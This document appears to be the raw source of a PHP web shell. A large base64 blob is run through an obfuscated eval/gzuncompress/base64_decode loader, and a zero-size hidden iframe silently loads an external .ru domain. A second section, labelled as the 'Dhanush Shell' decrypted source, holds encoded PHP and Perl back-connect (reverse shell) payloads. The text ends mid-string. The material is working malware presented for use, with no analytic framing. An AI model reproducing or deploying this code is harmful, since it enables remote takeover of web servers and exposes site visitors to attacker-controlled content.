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hw/GwV49n3gylzKLR9ura7vFy5KTK5i7J4PreGm22yzeVgtdZ+/xeklvHbUels6WLw9b+zlr+fRsef9ssLU3WLruVczcQuex1tup7eaye0/22n62vrCa3VlcbV+uVhOnu/X6SWln73HvLmkvlY6W7vZmc8f33a3D9v7F3fLO7ONKobhS3X4+vnvejtcPTi9uB9b90lWtfNeoL7VsM55YMe5Pq06/cv94vHzV7T2WZleum+e3/YfL/XZncDd7lMk+Fp1m9TbbyDfLmftG76J6+7C4bDSOru7Pn9v64Gr26rJg3N4vDFaeu1dbxcriYz51l8m28zuJx7NU4rB5d/jYmh3kFk4fc9v3B/W984Pr7aODtf2OZZatds/ZT9jHO7Nxy9zeeXro12zn5G75vtg1K/3uyeJ54bTRM3au9m8bXbN6cFhuJiqNI6fQvV87t53j7nOjePKsJ+tbl5md88pCpl01E8ndjLG007rf6eTu9HKtPKgtVh6zmYXD6+ed3lUx2SxU7rJGv9hO2MnF863u6cNlY3Dfea7kKzuNw9Spfbwdt3aMen67Pbh0jiuPueOr+/LK9lJLjxuNg73sil2rFFbvFs+bzs5F++B+t/u03z6/XFo9zratTiLb0lezPX2/1n86t3LO7F1lN99ciRvtfn3JPry4a2d6SWclazaOaubj7dnzhVMx64XGZTJZKdYXZvfvC9lCPJM873Xiejt30r282K9Va8VSvlTJLesL54+zlev2ZafyuLB3t526Pjnc3+klFgpm5WQlk689LB91rlvNtWJur1nf358d7B4dJbr7p7lybuW2fN0qp8qH/XJyrWk8ZFaL1k6nZJzsWuZCtdS9fbrK7Z62O/trJb22mLeqxl1jezlRjRcaq4vFh76Vze/MliuLbTN3UM0Z93fVbvm82CvkUpnzzFXuMLt72926yi7klht24643m8BorCzv1qvnC0f6aefkoZktbd/fL1Zme8bZU1dvF45Wz4/3K+d7xfPSgbXz+NTsODXz8qh2drB02tw5yl4tJrOn962cbd71nerS823DWF55TjyfPx9vLWwf6AcPK3v66eD0YOXKaa/ulBur+5d7D43ig9NsXuefnFavXlpory0VnlvX+4PFy3r/onnQ3K/2HnI9qxs/GhztHc0+2bs7q9vPxUQ5WcuuPMXrx6v32cudwcqZnajc3zaP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";
202 
203 eval("?>".gzuncompress(base64_decode($bhart)));
204 
205 ?>
206 <iframe width=0px height=0px frameborder=no name=frame1 src=http://fightagent.ru> </iframe>

Dhanush Shell Source Code (decrypted)

   1 <?php
   2 $back_connect_p = "eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
   3 $backconnect_perl = "eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
   4 $zone = "vVRtb9owEP6OxH+4ZhFKWkJg6roqEFS0VStaX1ChmybKB8c5wGpiZ7ZZS6vut8+Gjm5V1r18mPLBuedenrvznV9shQslw4TxsECZVSvVCpt6Wwe983cfxq2Jf1etFJJxDc6lNh+/5E77JyhHUFTq5e6c0CsYH0xgSeZCwDgVegJU5FDidCSuYSTgQmEElhZuBcdGkUFnyDRCxpTuQudCwlucEooSTkmO3e+B8IZpc9xXKy6RnyGGdbbNiQHdmVwUYoO1LEbnIi9grTGiKJB7pO50rLfjG+RAWdYYOqRrzTOh0CNW4SYGVZRkRHorIwtOhfRcEjfbLunEbmKOnR2/Wrl7oLFmY5dYYtPJjQjxVwg/iQVQwkGhLZJfKUjQhEOQWGRLH+5ALRKl5aNbHZp1eO1D7DhtuN80cbwzgYFQ2mTGU/ZIum7QQiH0z6JoKOgV6ijqnx6ObDXKyKagp6qgy/HaGyDKXppKiLvgPJ+oUwdrPRBSW+t9k+JACi1WrpoWjg9CAscbvbn2NbczOBuOIORCs+kyzIlS8BumpwF6lGKhI9gOty/lj3P1oD/HKUqU0b/FDY4Jny3IzI6lDh